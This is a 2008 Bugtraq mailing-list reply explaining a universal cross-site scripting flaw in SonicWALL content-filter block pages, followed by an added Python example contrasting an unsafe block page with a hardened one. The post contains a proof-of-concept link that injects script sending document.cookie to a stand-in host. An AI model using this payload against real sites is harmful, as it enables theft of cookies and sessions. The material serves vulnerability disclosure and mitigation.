Message-Id: <200811050757.mA57vg71003479@www5.securityfocus.com>
Date: Wed, 5 Nov 2008 00:57:42 -0700
From: unknown.pentester@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: Re: Re: [Full-disclosure] Universal Website Hijacking by Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day

It is universal because any domain/website can be hijacked, not because all vendors are affected! I never claimed that all vendors are affected.

Also, the SonicWALL vuln you mentioned is NOT the same issue! That vuln affects the web logs console of the appliance which means that exploitation is aimed at compromising the *device* NOT websites the victim user visits. 

Notice that the advisory says:

"the attacker may execute scripts automatically when the logfile is viewed."

The vuln I reported allows you to hijack any site, i.e. run scripting code within the security context of any website. In other words, it's not a vulnerability that can be used to compromise the SonicWALL appliance, but rather to steal information from any sites (i.e.: active webmail session), steal cookies, etc ...

Furthermore, the targeted website doesn't have to be blacklisted (i.e.: adware site), but rather *swearing terms* need to be blocked. By simply inserting a swearing term (notice the f word) into any site's URL, script injection within that site is possible. i.e.:

<html><head><title>SonicWall Universal XSS PoC</title></head>
<body>
<h2>SonicWall Universal XSS PoC</h2>
<a href="http://google.com/fuck#<script>location='http://evil.foo/'+document.cookie</script>">Click me!</a>
</body></html>

That's because the SonicWALL appliance replies on behalf of the requested site, so the browser "believes" that the inserted script is actually returned by the requested website. You could think of this as a MITM XSS.

Hope it makes sense.
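Added example, not code from the post or from SonicWALL: a block page written in the pattern the post describes (the filter answers for the requested site and echoes the URL unescaped into that response) beside a hardened form that redirects to the filter's own host and escapes the URL. The filter hostname and sample URL are constructed, and server-side echoing of the URL is an assumption, since the post does not say where the reflection happens.

```python
import html
from urllib.parse import quote

# Assumed hostname for the filtering appliance's own block page (constructed).
FILTER_HOST = "filter.example.internal"

# Constructed sample of a request the filter would block: a filtered word in the
# path plus script markup appended to the URL, in the shape of the post's PoC.
SAMPLE_BLOCKED_URL = "http://www.example.com/blockedword#<script>alert(1)</script>"


def unsafe_block_page(blocked_url: str) -> str:
    """The pattern the post describes: the filter answers *for* the requested
    site and echoes the URL into that response without escaping, so the markup
    runs in the requested site's origin."""
    return f"<html><body>Access to {blocked_url} is blocked.</body></html>"


def safe_block_response(blocked_url: str):
    """Hardened variant returning (status, headers, body).

    Two independent mitigations:
      1. The client is redirected to the filter's own host, so the block page
         never executes in the requested site's security context.
      2. The echoed URL is HTML-escaped (body) and percent-encoded (Location).
    """
    location = f"https://{FILTER_HOST}/blocked?url={quote(blocked_url, safe='')}"
    body = (
        "<html><body><p>Access to "
        f"{html.escape(blocked_url, quote=True)} is blocked by policy.</p>"
        "</body></html>"
    )
    headers = {
        "Location": location,
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return 302, headers, body


def echoes_raw_markup(page: str) -> bool:
    """Minimal check to run against a captured block page: does the HTML
    still contain an unescaped <script> tag?"""
    return "<script" in page.lower()
```

Pointing a browser at a filter-served block page and inspecting whether the response carries the requested site's host, and whether the URL appears escaped, is the quickest way to tell which of the two patterns an appliance follows.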
